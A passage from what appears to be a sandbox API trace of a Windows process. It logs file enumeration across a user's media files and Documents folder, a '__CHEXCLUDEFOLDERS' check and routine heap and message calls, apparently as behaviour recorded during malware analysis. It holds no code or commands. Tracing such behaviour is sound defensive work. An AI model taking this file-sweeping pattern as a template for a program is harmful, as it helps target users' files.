wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8e2a80 [0157.306] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.306] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.306] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.307] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="testers.exe", cAlternateFileName="")) returned 1 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.307] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.307] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.307] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8e2a80 [0157.307] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.307] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.307] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.308] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b7cd50, ftCreationTime.dwHighDateTime=0x1d5e14b, ftLastAccessTime.dwLowDateTime=0x33873000, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x33873000, ftLastWriteTime.dwHighDateTime=0x1d5df90, nFileSizeHigh=0x0, nFileSizeLow=0x411c, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="TtEAhK_e6.flv", cAlternateFileName="TTEAHK~1.FLV")) returned 1 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdc050, ftCreationTime.dwHighDateTime=0x1d5e739, ftLastAccessTime.dwLowDateTime=0xfe74e650, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0xfe74e650, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0x1828a, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="urMVeYqgrC9wPF_WA.mp4", cAlternateFileName="URMVEY~1.MP4")) returned 1 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332a6c0, ftCreationTime.dwHighDateTime=0x1d5df48, ftLastAccessTime.dwLowDateTime=0xc3dcaee0, ftLastAccessTime.dwHighDateTime=0x1d5e6d5, ftLastWriteTime.dwLowDateTime=0xc3dcaee0, ftLastWriteTime.dwHighDateTime=0x1d5e6d5, nFileSizeHigh=0x0, nFileSizeLow=0x41a7, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="VLNsdshtM2X.png", cAlternateFileName="VLNSDS~1.PNG")) returned 1 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f95e030, ftCreationTime.dwHighDateTime=0x1d5dc57, ftLastAccessTime.dwLowDateTime=0x985b5670, ftLastAccessTime.dwHighDateTime=0x1d5de8f, ftLastWriteTime.dwLowDateTime=0x985b5670, ftLastWriteTime.dwHighDateTime=0x1d5de8f, nFileSizeHigh=0x0, nFileSizeLow=0x9f3, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="wDndAAy--Qv4hO-j v.flv", cAlternateFileName="WDNDAA~1.FLV")) returned 1 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e64a30, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x3c03b0, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0x3c03b0, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="wE2eF3.flv", cAlternateFileName="")) returned 1 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8858920, ftCreationTime.dwHighDateTime=0x1d5dd7c, ftLastAccessTime.dwLowDateTime=0x52b3ff80, ftLastAccessTime.dwHighDateTime=0x1d5dff4, ftLastWriteTime.dwLowDateTime=0x52b3ff80, ftLastWriteTime.dwHighDateTime=0x1d5dff4, nFileSizeHigh=0x0, nFileSizeLow=0x4db6, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Y8qF6zL.mkv", cAlternateFileName="")) returned 1 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4813c0, ftCreationTime.dwHighDateTime=0x1d5dda2, ftLastAccessTime.dwLowDateTime=0xa7eda190, ftLastAccessTime.dwHighDateTime=0x1d5dde7, ftLastWriteTime.dwLowDateTime=0xa7eda190, ftLastWriteTime.dwHighDateTime=0x1d5dde7, nFileSizeHigh=0x0, nFileSizeLow=0xa2f, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="zkkA.wav", cAlternateFileName="")) returned 1 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ad310, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x5571c040, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0x5571c040, ftLastWriteTime.dwHighDateTime=0x1d5de91, nFileSizeHigh=0x0, nFileSizeLow=0x7952, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="_IlnDJr.mp4", cAlternateFileName="")) returned 1 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10a007b, ftCreationTime.dwLowDateTime=0x3fad, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xf, ftLastWriteTime.dwHighDateTime=0x114007c, nFileSizeHigh=0x3fad, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="_I\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.310] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.310] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.310] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaa89f20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaa89f20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0157.311] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.311] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.311] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.311] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c90 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.311] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d10 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.311] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b08 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d10 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.311] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0157.311] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 